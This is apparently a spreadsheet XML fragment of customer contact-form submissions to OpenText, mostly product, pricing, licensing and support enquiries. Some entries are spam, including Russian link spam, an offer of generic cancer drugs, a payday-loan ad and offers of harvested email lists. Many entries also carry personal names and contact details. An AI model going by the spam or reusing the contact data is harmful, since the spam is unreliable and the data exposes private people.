    <t>We are looking to integrating Right Fax with our EMR, Netsmart. In their latest release notes, they mention RightFax integration. We currently have a PRI line and use Avaya phone system (using digital/analog converter) for all of our faxing/communication. I would like to find out about any solutions that we might be able to use to upgrade our faxing (faxing over IP? cloud based solution? etc). I don't know if we would have to purchase through Netsmart or you guys, but they really don't seem to have any info on anything at this time. I would really love to talk to someone today or tomorrow just to get a general idea on possible products and pricing. Thanks for your time!</t>
  </si>
  <si>
    <t>Hi,_x000D_
Galenica is currently looking for a document management system for the Regualtory Affairs and Quality and R&amp;D departments._x000D_
A collegue of mine told me that you might have the solution with EMC documentum. I have been looking at the presentations and webinar on your homepage and found the system interesting. I would like to have more information about the system. Of course there is a user requirement specification document that I could provide to you, if you like._x000D_
_x000D_
As we are currently in the end phase of selecting systems we would also like to know:_x000D_
- What current life science customers do you have_x000D_
- Is your system available for a small company with only 60 users?_x000D_
- Do you have ready modules or is there a lot of configuration to do?_x000D_
- Costs are always something we need to know, how is your price model setup?_x000D_
_x000D_
With a short time left, is there a possibility to set up a meeting by phone or web based?_x000D_
_x000D_
Best regards,_x000D_
Maria Hammer</t>
  </si>
  <si>
    <t>Hello, At present we have Unigraphics NX11.0, I have been requested to upgrade a system to have NX 11.0.2.7 MP1. Is there somewhere we can download this upgrade or verions. This has already been done on one of our systems by ANX</t>
  </si>
  <si>
    <t xml:space="preserve">I cant reset my password or download your software </t>
  </si>
  <si>
    <t>Working on  a DAM solution for my private consulting firm._x000D_
Please provide details of Licensing/Pricing for OTMM.</t>
  </si>
  <si>
    <t>I m interested working with this company _x000D_
Because I m impressive for ur company growth</t>
  </si>
  <si>
    <t xml:space="preserve">SEO leads at affordable prices._x000D_
_x000D_
Hi SEO Company,_x000D_
_x000D_
We are US Based SEO Leads Provider._x000D_
We can provide you 20-25 Leads in a day of any country Like: - AU, USA, UK, Canada, China, New Zealand and etc. Our leads will be 100% genuine. _x000D_
_x000D_
Each SEO Leads has requested information about an SEO project and are actively looking to hire an SEO Service to help them with Search Engine Optimization and Marketing Services. After receiving the lead we will forward for further action._x000D_
_x000D_
We have good number of employees for email marketing. We are able to generate high quality SEO leads by filling out the contact forms through Google Search. _x000D_
_x000D_
We don’t send our leads to 2 people because there is no worth in that. We don’t work on cleaning companies. _x000D_
We mostly work on ecommerce websites, dentists, limousine companies and etc. We have great team who can deliver your order on the time. _x000D_
_x000D_
Because if we serve well we will get more order from you. _x000D_
Regards,_x000D_
Paul Collingwood_x000D_
paul.soetraffic@gmail.com_x000D_
</t>
  </si>
  <si>
    <t>We are looking for Documentum training (User &amp; Administrator). Please advise us on the various offerings.</t>
  </si>
  <si>
    <t>I have recently had to rebuild my laptop and will need to reinstall my OpenText socks client. I purchased the license some time ago and cannot find the details.  Please could you forward me the license details? Thanks Rob Hicks</t>
  </si>
  <si>
    <t>Hello,_x000D_
We intend to migrate our current EDMS (Electronic Document Management System) application to another EDMS (ECM) application that use CMIS standard and has been integrated with the application Asset Suite (ABB Company). For this we need a contact information to send a proper request for a presentation of your product, Documentum, to our company._x000D_
Thanks!</t>
  </si>
  <si>
    <t>Requesting hardware and software requirements for installation and running of Exceed.</t>
  </si>
  <si>
    <t xml:space="preserve">we need a solution to covert our physical format to more logical digital intelligent format </t>
  </si>
  <si>
    <t>Hello_x000D_
_x000D_
I would like to get in touch with you as we are interested on a agreement to sell your Gupta Report Builder in conjunction with some of our products._x000D_
_x000D_
Please contact me when you can. I'm located in Italy CET time zone._x000D_
_x000D_
Thank you_x000D_
Federico</t>
  </si>
  <si>
    <t>Bitte übersenden Sie mir ein Angebot für OpenText RightFax. _x000D_
Bei technischen Rückfragen für ein Angebot können Sie sich gerne an Herrn Jan Pignar 07221 955623 wenden._x000D_
_x000D_
Vielen Dank</t>
  </si>
  <si>
    <t>I do need a new activation key for our Gupta Report Builder Verdion 5.2 because we had to replace an old Computer.</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
I would like to inquire on behalf of our Estonian branch for OpenText Exceed &amp; Exceed 3D"Academic EDU (10 licences) and Diction 7 for PC (Academic, Educational) (3 new licenses). I would like to ask for price offer with relevant reseller discounts and other important information for ordering?_x000D_
_x000D_
Looking forward to your response!_x000D_
Līva Štāle</t>
  </si>
  <si>
    <t>Difficulty experienced in finding OCEAN - connect</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Support,_x000D_
I have requested a support access, but I still cannot access MY SUPPORT_x000D_
Can you grant me the access or tell me what additional information you need ?_x000D_
Thx_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking to cell my ecm for Toyota </t>
  </si>
  <si>
    <t xml:space="preserve">How can we buy your product? we are interesting with eDOCS DM 5.3.1 or latest version, please let me know. thank you. </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We want try gupta report builder. For batching report sending._x000D_
_x000D_
Evaldas Povilaitis</t>
  </si>
  <si>
    <t>Dear Sirs,_x000D_
I’m working as Chief Information Officer in JSC "NIPIGAS". NIPIGAS is Russia’s leading center_x000D_
for design, supplies, logistics and construction management (EPC). The company is a part of_x000D_
SIBUR, the largest integrated gas processing and petrochemicals company in Russia. NIPIGAS_x000D_
takes part in largest projects: Amursky GPP (Gazprom), ZapSibNeftekhim (SIBUR), Moscow and_x000D_
Omsky refinery (Gazpromneft), Yamal LNG and Arctic LNG-2 (NOVATEK) and others._x000D_
To automate and manage technical documentation, we already use the tool OpenText Documentum_x000D_
Capital Projects in our large projects._x000D_
However, we’d like to know about OpenText Documentum Asset Operations to automate_x000D_
workflows for plant operations and maintenance._x000D_
Could you provide us the list of successful deployments of OpenText Documentum Asset_x000D_
Operations in energy industry and help us to organize a reference visit for experience exchange?_x000D_
Thank you in advance._x000D_
Sincerely,_x000D_
Pavel Klepinin_x000D_
CIO</t>
  </si>
  <si>
    <t>I need to meet IT manager for adding values on IT solutions.</t>
  </si>
  <si>
    <t xml:space="preserve">We are OpenText CEM partner in Indonesia and we want to request trial license key for Exstream module: AFP viewer_x000D_
_x000D_
As we’re in talk with Citibank Indonesia for printing project_x000D_
And our inkjet printer can only receive AFP input, currently we convert manually from pdf to AFP_x000D_
_x000D_
We also comminicate with Jason Chang and Callistus Lim_x000D_
_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">To whom it may concern,_x000D_
_x000D_
My name is Kunal Walia, and I'm contacting you on behalf of 5428 Breaking Bots, the Markham District High School robotics team that is involved with various FRC competitions._x000D_
_x000D_
FIRST (For Inspiration and Recognition of Science and Technology) Robotics is a non-profit organization created to inspire young people to get involved in science, technology, engineering and math. FIRST has inspired over 5,000 teams from all around the world and continues to do so every year. Each team has only six weeks to design and build a 120-pound robot that will work with, and compete against, other robots at over 60 district regional events. FIRST not only inspires people of all ages to get involved with science and technology, but promotes Gracious Professionalism and Coopertition amongst teams._x000D_
_x000D_
We’d love for your company to play a significant role in the success of our team this year. The kick-off date (when teams will be allowed to begin building their robot) will be on January 6th, 2018 - in-kind donations or monetary support would be greatly appreciated. Our sponsorship package, outlining our request in more detail, can be found attached to this email. Logos of our sponsors can be found on our website (http://breakingbots.weebly.com/sponsors.html). In addition, all donations are tax deductible and a tax receipt will be provided. _x000D_
_x000D_
If you have any questions or concerns, feel free to send me an email or call me at 647-712-5560 (preferably after 4). Thank you so much, I look forward to hearing from you soon!_x000D_
_x000D_
It would be greatly appreciated if you could respond by Friday December 8th, 2017._x000D_
_x000D_
Sincerely,_x000D_
Kunal Walia_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
Would you be able to provide me with the Technical Specifications for Documentum? I am unable to find them on your website_x000D_
Troy</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
I'm requesting a trial version of OpenText Exceed 15 to ensure that it functions in the same manner as Hummingbird Exceed 10.</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I am looking for the export classification information for one of your products: OpenText WebDAV 10.5.0. Any help is appreciated._x000D_
_x000D_
Thank you, _x000D_
_x000D_
Emily Uhrhammer_x000D_
Emily.Uhrhammer@ngc.com</t>
  </si>
  <si>
    <t>Looking to find a contact who can talk about Open Text's capabilities on GDPR.</t>
  </si>
  <si>
    <t>Hello! We have a client who we are presenting EDMS and QMS solutions to, and believe that OpenText may be a fit for their needs. The client has some unique requirements, so I'd like to see if someone at OpenText has time for a 1/2 hour call this week to discuss with me, and then if it's a fit, possibly setup a high level demo with my team, and then a more in depth one width the client over the following 2 weeks. The demos and possibly purchasing decision on this project may move quickly._x000D_
_x000D_
Please let me know how if someone on your team has availability this week, ideally Tuesday for a 1/2 hour call with me, and then possibly for a 1/2 hour quick overview with my team later in the week._x000D_
_x000D_
Client demos would then be the weeks of 12/11 and 12/18._x000D_
_x000D_
Thanks,_x000D_
Nick Yankanich</t>
  </si>
  <si>
    <t>Hello, We are interested in the ON-demand or e-learning courses for CCE formally StreamServe. Is there a price for just this portion of the training? I don't really want or need al the other course._x000D_
Thanks,_x000D_
Guy Tuft</t>
  </si>
  <si>
    <t xml:space="preserve">We are having issues logging into the portal at the following web address: _x000D_
https://catalogue.gxs.com/QRSGUI/jsf/login/login.jspx _x000D_
_x000D_
When we request the password to be reset, it confirmed that a reset email has been sent. However, we believe the email is being sent the incorrect email address. _x000D_
_x000D_
Could you please provide the email(s) of active users for our company. We are in the processes of restructuring and would like ensure that the correct individuals have access. _x000D_
_x000D_
Thanks,_x000D_
Travis Bowers_x000D_
Compliance Manager_x000D_
Revman International Inc. </t>
  </si>
  <si>
    <t>Would like to see how we can add native SSH support to our current Exceed setup</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I need to solve some questions I have about developing in Opentext Teamsite. Could you please contact me via email?_x000D_
_x000D_
Thanks,</t>
  </si>
  <si>
    <t>need a quote</t>
  </si>
  <si>
    <t>Novo Nordisk would like to invite Open Text to bid in a RFP for a HR Records Management Solution.  Please advise who / where the RFP should be sent.   Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">Quote for RightFax Cloud Solution. Estimation of 50 - 75 pages per day outbound/inbound. </t>
  </si>
  <si>
    <t>Dear opentext,_x000D_
_x000D_
I'm looking for solution to automate processing of paper and pdf invoice to be imported into SAP ERP._x000D_
_x000D_
Best Regards</t>
  </si>
  <si>
    <t>Need to get access Knowledge base</t>
  </si>
  <si>
    <t>Attention,_x000D_
We have try severally to write to you requesting for your fax service, for growth of our business, be kind to tell us more about how the service do work and how can we sign up for this service, we will be looking to receive more information about out request._x000D_
_x000D_
Regards,_x000D_
_x000D_
George Campbell_x000D_
Norland Pure_x000D_
2001 SW 6th St; Lincoln, NE - 68522_x000D_
Phone: 402-858-2752_x000D_
Fax:   402-875-5504_x000D_
www.norlandpure.com_x000D_
www.bottledwaterlincoln.com</t>
  </si>
  <si>
    <t>I need Exceed software quote</t>
  </si>
  <si>
    <t>When I was a student with the Open University we used First Class for our conferencing.  I am now involved with an alumni group and we are looking for something similar.  We do not need things like calendaring, just a way to run on line conferences for our tutor groups.  I can see that you offer the First Class client as a download.  If we want to host this at our university, how do we get the server app?</t>
  </si>
  <si>
    <t>Hello - can you please email me product pricing for the Automated Outpot Accessibility?  We have PDF's that we would like to automatically convert to accessible.  Please also include information on how the software works and how you "exact" it is.  Thank you - Gerry</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning,_x000D_
_x000D_
I am contacting you from Business Reporter at the Telegraph in relation to a campaign I have just started on "The Future of Supply Chains"._x000D_
_x000D_
I wanted to have a discussion with someone at OpenText to learn about the work you do in the sector._x000D_
_x000D_
If it was something relevant to the angle I was positioning the campaign - a series of informative interviews, highlighting the necessity of transforming supply chain infrastructure - I would also like to discuss possible involvement within this series. _x000D_
_x000D_
If somebody could contact me back either on the email address I have given or on my number I would love to start this conversation. _x000D_
_x000D_
Many thanks,_x000D_
_x000D_
Lana_x000D_
</t>
  </si>
  <si>
    <t>We have clients using DM 10 patch 4 on a Windows 10 workstations. The backend is Server 2008 r2 with DM 10 patch 4._x000D_
The users are being told they or other users have documents open that they do not have opened.</t>
  </si>
  <si>
    <t>Can you tell me when the next release is for Open Text Brava Reader?  Also, I am looking for a general TIFF viewer for our users - will the ability to view TIFF documents still be available in the next release of Open Text Brava Reader?  Lastly, what are the licensing agreements with the free download of Open Text Brava Reader?</t>
  </si>
  <si>
    <t>My company was registard on the CSD but it is not visible from the system i have the report that come after registration.</t>
  </si>
  <si>
    <t xml:space="preserve">We are testing Win 10 and we would like to install:_x000D_
OpenText Administration Client 10.5.0.747 _x000D_
OpenText Enterprise Connect 10.0.2_x000D_
Would you please send us a link where can we test the above software?_x000D_
Regards,_x000D_
Julio Cabellos_x000D_
</t>
  </si>
  <si>
    <t>Esclarecer dúvidas a respeito de atualização tecnológica da IDE Centura SQLWindows 2.1 para OpenText Grupta Team Developer e compatibilidade com versões do Windows.</t>
  </si>
  <si>
    <t xml:space="preserve">I am one of the IT support staff working in British Airways PLC and wanted to fix an issue with their Kofax licenses and getting the below error message_x000D_
Insufficient licensing to run the requested model or Feature _x000D_
_x000D_
Kofax licence Serial Number	GB00559 Product Code 835C93C71 _x000D_
</t>
  </si>
  <si>
    <t>Hey,_x000D_
_x000D_
I would really like to have a quick chat with somebody from your company, who deals with partners._x000D_
_x000D_
It's going to be a quick discussion to see if we are perhaps fit to be partners in the future._x000D_
_x000D_
Don't hesitate to contact me, or just update me who and when to call._x000D_
_x000D_
Thanks,_x000D_
_x000D_
_x000D_
Andrey Genchev_x000D_
Business Development_x000D_
Prime Holding JSC_x000D_
m: +44 1 590 700 027_x000D_
e: andrey@primeholding.com_x000D_
w: www.primeholding.com</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Working on a customer escalation, trying to access Escalation # 36506 For Ticket 3322141 details and attachments, systems complains I don't have access to this part of the site. Could you please elevate my privileges to see all Ticket/Escalation related information._x000D_
_x000D_
Thanks!_x000D_
Madhu</t>
  </si>
  <si>
    <t>Looking for Streamserve as a solution for printing documents from our QAD ERP system.</t>
  </si>
  <si>
    <t>pladis, formally United Biscuits, are looking to replace the Manugistics OAI (WebConnect) software, (formally Vignette® Business Integration Studio) with a supportable replacement. Can you please advise what is currently available from Vignette / Open Text._x000D_
Thank you.</t>
  </si>
  <si>
    <t>Need to cancel my account</t>
  </si>
  <si>
    <t>looking forward to join your organization</t>
  </si>
  <si>
    <t xml:space="preserve">Buchhaltung - bitte rufen Sie mich zurück, da eine tel. Kontaktaufnahme nicht möglich war weil angeblich alle Leitungen besetzt waren._x000D_
Danke </t>
  </si>
  <si>
    <t>_x000D_
Dear,_x000D_
We would like to know if our customer Infrax could use the OpenText Composer Notes to migrate 88 Notes applications to .Net applicaties? If so could you make us a price quotation? _x000D_
Thank you very much for your shortly reply. _x000D_
Kind regards,_x000D_
Natalia Subagyo</t>
  </si>
  <si>
    <t xml:space="preserve">Einzahlung 2945,25 Euro durch GXS GmbH_x000D_
Sehr geehrte Firma,_x000D_
 	_x000D_
am 29.11.17 sind uns auf Grund Ihrer Überweisung 2945,25 EUR gutgeschrieben worden. _x000D_
Wir können den Betrag jedoch nicht buchen, da auf dem Zahlungsbeleg kein ausreichender Verwendungszweck angegeben ist bzw. die Aufstellung (Zahlungs-Avis) nicht vorliegt._x000D_
 _x000D_
Der Überweisungsbeleg Ihrer Zahlung enthielt folgenden Verwendungszweck: _x000D_
 _x000D_
BANKREF AZMES29111744326 01-DE1320000003932018 EUR 2.945,25 AZMES2911174_x000D_
4326 /OCMT/EUR2945,25/_x000D_
_x000D_
Bitte teilen Sie uns den Verwendungszweck (Rechnungsnummer oder Buchungskonto aus Ihrer Telekom-Rechnung) umgehend telefonisch oder per Fax mit._x000D_
 _x000D_
Zukünftige Zahlungsavise können Sie direkt senden an:_x000D_
Fax: 0391/580103247_x000D_
Mail: KUB-Avise@telekom.de_x000D_
</t>
  </si>
  <si>
    <t>Firstclass password exploit.</t>
  </si>
  <si>
    <t>We are looking for a record management system to meet the privacy ordinance.  Would you please redirect me to the local sales support in Hong Kong?  Thanks.</t>
  </si>
  <si>
    <t>I am looking for a DMS solution for my client. The preferred solution must have the functionality as per Scope of Work, Volume estimations and Scanner details are given as well._x000D_
_x000D_
I need to understand the following_x000D_
_x000D_
1) Deployment model. What options do we have On-Premise? Cloud? SaaS etc._x000D_
2) What is the Licensing model. User based, consumption based, perpetual license etc._x000D_
3) Compatibility with scanners? Preferred scanners type and brand?_x000D_
	- Pls share scanners compatibility list</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
I have visited your site https://www.opentext.ca and thought it was excellent.  Your site is professional and offers excellent value to your visitors._x000D_
_x000D_
I noticed that you have linked to other sites and thought my website might be of interest to you and your website visitors. Actually we deal in call center services , such as Inbound &amp; Outbound call center services . _x000D_
_x000D_
As our websites and target audience are closely related but we are not competing in any way, I hope that you will do a reciprocal link exchange with us. I have provided my site's details below, could you please let me know exactly what details to use when I link to your site._x000D_
_x000D_
--------------------------------------------------------------------------------------------_x000D_
_x000D_
Anchor Text:_x000D_
_x000D_
Call center services_x000D_
_x000D_
Link:_x000D_
https://bestcallcenter.in/_x000D_
_x000D_
_x000D_
--------------------------------------------------------------------------------------------_x000D_
_x000D_
 I look forward to your favourable response, and thank you in advance for your time and consideration. Please send your link details to us so that we can also add and inform you within few hours. _x000D_
_x000D_
Kind Regards,_x000D_
David</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Dear whom so ever it may concern,_x000D_
_x000D_
Greetings from Technocerts._x000D_
_x000D_
We Technocerts is a pioneer in Professional training's and certification providers, we create course programs, exams, and lab projects that help professionals across the world successfully to prepare for and complete certification exams with ease. Our unique blended model of training brings together the best of self-learning and online training, making for a successful learning experience._x000D_
_x000D_
We strive to constantly improve our learning frameworks to make them more user-friendly. Our courses are upgraded continuously to ensure our learners are up-to-date on the latest industry requirements and best practices. We assist our learners in applying for the certification exam of their choice, and our vibrant community of experts and certified professionals is a powerful resource pool of tips, tricks, and insightful advice._x000D_
_x000D_
Please find the list of Certification courses we offer :_x000D_
_x000D_
    PMP (Project Management Professional)_x000D_
    MSP 2013 (Microsoft Project 2013)_x000D_
    Six Sigma Yellow and Green Belt Certification training_x000D_
    Business Case Writing_x000D_
    PMI-PBA (PMI- Professional in Business Analysis)_x000D_
    Safe Agilist Certification program_x000D_
    Agile and Scrum_x000D_
    PMI-RMP_x000D_
    Big Data and Hadoop Development_x000D_
    Function point Analysis_x000D_
    Data Science_x000D_
    PGMP_x000D_
    PFMP_x000D_
    PMI-ACP_x000D_
    Financial Modeling with Excel More details... _x000D_
_x000D_
We are offering special discount for group participants and In-house/corporate training's on any of our certified training programs._x000D_
_x000D_
Kindly let us know if anything else to be clarified._x000D_
_x000D_
Awaiting your kind and positive reply._x000D_
_x000D_
_x000D_
Thanks and Regards,_x000D_
Jef Axel- Client Relationship Manager_x000D_
Email: jef.axel@tchnocrtcourses.com_x000D_
TEL:+1 480 582 9855_x000D_
Technocerts_x000D_
www.Technocerts.com_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Please submit your quote for F-Response-Enterprise edition-	Advance computer forensics acquisition/automation_x000D_
</t>
  </si>
  <si>
    <t>Could you please give the email address of your support person in australia or pacific. Alternatively the email if anybody who provides support for australia or the south pacific region in your organisation._x000D_
We need to change the version of the os we are running and i need to find out if we need to upgrade our accell ids els license._x000D_
_x000D_
Thanks_x000D_
Vera velanova</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;a href=http://mayki-ok.ru&gt;мужские футболки westland&lt;/a&gt;_x000D_
 _x000D_
 _x000D_
[url=http://mayki-ok.ru][img]http://s018.radikal.ru/i512/1709/03/9dbe6161203d.jpg[/img][/url]_x000D_
 _x000D_
 _x000D_
[url=http://mayki-ok.ru]купить футболки mortician[/url]_x000D_
</t>
  </si>
  <si>
    <t>VIM point of contact</t>
  </si>
  <si>
    <t>looking for as3 software to trade with partner_x000D_
how can we download your software and set it up_x000D_
would like a trial</t>
  </si>
  <si>
    <t xml:space="preserve">Crizalk 250mg - Кризотиниб 250мг. Cтоимость, цена, купить, отзывы, отзывы пациентов _x000D_
 _x000D_
&lt;a href=http://india-med.net/anticancer&gt;Osicent 80: Osimertinib 80 мг Cтоимость, цена, купить, отзывы, отзывы пациентов&lt;/a&gt;_x000D_
 _x000D_
[url=http://india-med.net/lucius-pharmaceuticals-onko]LuciOlap - дженерик Lynparza - Olaparib Олапариб Купить, стоимость, цена, отзывы пациентов[/url]_x000D_
 _x000D_
&lt;a href=http://india-med.net&gt;купить гепцинат в москве&lt;/a&gt;_x000D_
 _x000D_
[url=http://india-med.net]пвт соф лед 16 недель[/url]_x000D_
</t>
  </si>
  <si>
    <t>Hi, i want to try BIRT iHub Ftype, but i can't retrive the activation code._x000D_
Can you help me, please?</t>
  </si>
  <si>
    <t>We use BIRT reports in Eclipse RCP application , looking foe technical support</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sales,_x000D_
_x000D_
I am looking for documents archiving system and like to find out more about this system from you company._x000D_
_x000D_
I Look forward to hear from you in this regard will be highly appreciated._x000D_
_x000D_
With Thanks and Regards,_x000D_
_x000D_
Eng.Mohamed Zakir Rasheed_x000D_
Technical and Operations Manager,_x000D_
Mob.#: 00966501888276_x000D_
rasheed@swamed.com.sa_x000D_
WhatsApp #: 00966541421910_x000D_
Skype: rasheed@swamed.com.sa_x000D_
</t>
  </si>
  <si>
    <t>I have a client meeting to discuss the following SOA products to Singapore Tax Authority on Monday and I am responsible to proving OpenText Exstream is the right fit for their enterprise solution. _x000D_
_x000D_
- OpenText Exstream_x000D_
- AdobeEM Forms_x000D_
-  Intelledox Infiniti_x000D_
_x000D_
--- _x000D_
Here are some of the questions that I believe the client is looking for: _x000D_
_x000D_
1.	What are the list of integration services OpenText Exstream has:_x000D_
a.	IBM filenet is their document management system (dms) and they want to continue using that _x000D_
2.	How does the archiving works? Do we archive a copy of the generated pdf for example to the central repository of the Exstream?_x000D_
3.	Do we have template versioning aside from the language versioning?_x000D_
4.	Can I search templates?_x000D_
5.	Can I search text within the templates?_x000D_
6.	Do we have template suggestions? Ie. Exstream will suggest relevant templates based on categorization and/or classification?_x000D_
7.	High level what are the pros and cons of Exstream. Ie. Why exstream is the suitable choice? _x000D_
8.	Can we expound how does the workflow approval works? _x000D_
9.	Do we have user management and how does permission works? Ie. Certain business users can see certain templates and can generate?_x000D_
10.	Do we have free trial license? _x000D_
11.	What is the cost? _x000D_
12.	In high level, how does exstream security works? _x000D_
13.	Do we have office here in Singapore?_x000D_
14.	How does the tracking works, please explain each? _x000D_
a.	Main points Singapore Tax Authority is looking are:_x000D_
i.	SLA_x000D_
ii.	Reconciliation_x000D_
iii.	Status_x000D_
15.	What is the supported maximum file size?_x000D_
16.	I know we have, but just to reconfirm, do we have parallel processing? How about post processing?_x000D_
17.	Can I define throttling? In 1 minute, how many files I can generate and print?_x000D_
18.	How’s the performance of Exstream?_x000D_
19.	Can I build on top of Exstream? If so, what is the programming language?_x000D_
20.	Do we have a preview of the template before I generate?_x000D_
21.	Can we share other clients who are using Exstream here in Singapore?_x000D_</t>
  </si>
  <si>
    <t xml:space="preserve">Самые лучшие и избранные демотиваторы за текущий день, которые обязательно вас порадуют  _x000D_
 _x000D_
&lt;a href=http://shnyagi.net&gt;а хорошем качестве&lt;/a&gt;_x000D_
&lt;a href=http://shnyagi.net&gt;сериалы онлайн&lt;/a&gt;_x000D_
 _x000D_
[url=http://shnyagi.net]познакомиться с красивой девушкой[/url]_x000D_
[url=http://shnyagi.net]лучшие фильмы с джулией робертс[/url]_x000D_
</t>
  </si>
  <si>
    <t>Последние строительные новости здесь [url=https://dipris-studio.ru/]dipris-studio.ru[/url]</t>
  </si>
  <si>
    <t>Requesting info re cost of DM system</t>
  </si>
  <si>
    <t>We are a ApplicationXtender partner. For some reason when I login to the Partner Site I get a blank white box, not matter what I choose from the drop down. Is the partner site down?</t>
  </si>
  <si>
    <t>Hi -- may I have contact information for the person in the Montreal office who manages Professional Services ? _x000D_
_x000D_
I am experienced in implementing OpenText MBPM and am trying to connect up with other OpenText professions in the area._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Ken</t>
  </si>
  <si>
    <t xml:space="preserve">Not receiving invoices via email. </t>
  </si>
  <si>
    <t xml:space="preserve">I need to add a new cover sheet but when I go to login to download a template I an getting an error. "We're sorry, your account does not grant you access to this resource." </t>
  </si>
  <si>
    <t>I have not received my renewal for RightFax and I am looking to get that paid before year end._x000D_
_x000D_
Thank you,_x000D_
Gianna</t>
  </si>
  <si>
    <t>keep getting "Confirm your email" message even after successfully confirming it multiple times.Please advise how we resolve it.</t>
  </si>
  <si>
    <t>Please, consider the email account jexposito@inclusionservices.com (Juan Exposito) in this proyect._x000D_
_x000D_
Best regards_x000D_
Carlos</t>
  </si>
  <si>
    <t>Looking for a DAM for the AWS Marketplace team</t>
  </si>
  <si>
    <t>Hello OpenText Team,_x000D_
_x000D_
We're looking at revamping our existing Customer Notification Template management system and are evaluating vendors from the CCM space. Could your pre-sales consultant kindly reach out to me to discuss if OpenText has such capabilities to offer?_x000D_
Our 2 main pain points are -_x000D_
1. 2600 Templates in 15 languages need to be normalized and managed forward using a Self Serve UI that Biz Users can use._x000D_
2. Content Translations handled automatically or semi-automatically as new languages are introduced._x000D_
_x000D_
Thank you in advance and I look forward to hearing from you soon._x000D_
_x000D_
Kr,_x000D_
Sonali Valia.</t>
  </si>
  <si>
    <t>Evaluation of CCM module for Managing customer notifications</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Are you attending the Legalweek tradeshow in New York?  Invite the attendees to your booth through our attendees email list. Target lawyers by their practice areas/specialization, by geographical market, based on their age, and the number of years they have been practicing law._x000D_
_x000D_
Looking to target legal professionals or law firms ?_x000D_
_x000D_
National Lawyer Database contains over 1.02 Million lawyers and 650,000 email addresses. The database includes mailing address, law firm name, lawyer name, phone number, fax number, email address, company websites, legal area of specialization/practice, years of practice, age of lawyer, University attended, year of graduation, all in an excel fomat (.csv ) that can easily be imported into any sales or contact management software._x000D_
_x000D_
Our Lawyer database has key demographic information that will allow you to pinpoint your direct marketing efforts. This database is great for marketing products, services, seminars to the legal community._x000D_
_x000D_
We have compiled and managing the most exclusive and extensive database of attorneys and law firms in the United States._x000D_
_x000D_
Regards,_x000D_
            Donna Collins_x000D_
            New Account Executive_x000D_
            B2B Tech Data_x000D_
            San Clemente/ CA/USA_x000D_
 _x000D_
If you do not wish to receive any further email about our dental list, please reply with the subject line unsubscribe and we will remove you from our dental mailing list._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>3-3713 StreamServe StoryTeller Quickstart v16 - will this 1 day class be offered online or in US in the near future?</t>
  </si>
  <si>
    <t>Hi, I wanted to check out the Foums for VIM discussion groups. Please let me know if there is a specific link to I can follow. Or, if I need to sign up for additional areas._x000D_
_x000D_
Thanks,_x000D_
Tanvir</t>
  </si>
  <si>
    <t>Sale  jute bag n garments</t>
  </si>
  <si>
    <t xml:space="preserve">We have been a Liquid Office customer / user since 2007. Currently on V 7.7. _x000D_
_x000D_
Is it possible to utilise the mobile offering (opentext everywhere) or render our existing forms designed via the form designer in other ways, so that we can use them on mobile devices._x000D_
_x000D_
Currently displaying an A4 sheet on a mobile phone is awkward. It would be good if there were alternative ways of displaying forms. Preferably without incurring a charge :-)_x000D_
_x000D_
Thanks_x000D_
Dave_x000D_
</t>
  </si>
  <si>
    <t>Срочно нужны деньги? _x000D_
- Не требуем сканы документов, справки о доходах,залоги и поручителей. Комиссию при погашении _x000D_
займа через терминалы оплачиваем мы. СУПЕРКОРОТКАЯ анкета, не выходя из дома. _x000D_
- Решение за 5-10 минут, перевод на карту, удобный личный кабинет. _x000D_
- Возможность безлимитного продления займа. _x000D_
- Программа лояльности _x000D_
Получение кредита онлайн на карту через 25 минут. Получить здесь:  http://bit.ly/2j4kbNv</t>
  </si>
  <si>
    <t>Brava TX licensing options.  I see a network version of 10 seats.  Is this concurrent licensing where I can install on say 30 PC's but only 10 can use it at any one time?  If so can this number be increased and what increment are the seats available in?  What infrastructure is required for the license server?  We have various license servers here for Catia, Surfcam, NX, and others.  If it uses FlexLM we could integrate in without an additional server.  Email is the best contact information as I work in a factory and I am away from my desk for extended periods of time.  I am deciding if it is best to purchase individual seats or network licensing.  I am thinking probably 15-20 seats if the model is a concurrent type would be sufficient, but since I am unsure I would like to option to add seats, hence the question on minimums to add for network licensing.  Thank you for the information in advance.  This will not happen till after the 1st of the year due to year end activities.</t>
  </si>
  <si>
    <t>Attention,_x000D_
We write to request for your fax service, for growth of our business, _x000D_
we will be looking to receive more information about out request._x000D_
_x000D_
George Campbell_x000D_
Norland Pure_x000D_
2001 SW 6th St; Lincoln, NE - 68522_x000D_
Phone: 402-858-2752 _x000D_
Fax:   402-875-5504_x000D_
www.norlandpure.com_x000D_
www.bottledwaterlincoln.com</t>
  </si>
  <si>
    <t>Hello -- this is a question related to training.  We may be interested in sending one of our team members to the online course, 3-0128 Content Server Troubleshooting Workshop .  However, the currently scheduled date of Dec 21/22nd isn't workable -- is this course likely to be offered again online early in 2018?  _x000D_
Thank you_x000D_
Amy</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir benötigen eine Auskunft über das geeignete Produkt und die Lizenzierung von OpenText, bei der Anbindung einer Marktkommunikations-Software._x000D_
In diesem Fall handelt es sich um „B2B by Practice“ von der Firma „Next Level Integration“._x000D_
_x000D_
Da neben anderen Archivsystemen auch IXOS/OpenText genannt wird, gehe ich davon aus, dass diese Anfrage Ihnen nicht neu sein wird._x000D_
_x000D_
Vielen Dank für Ihre kurzfristige Rückinfo._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Thomas Meyer</t>
  </si>
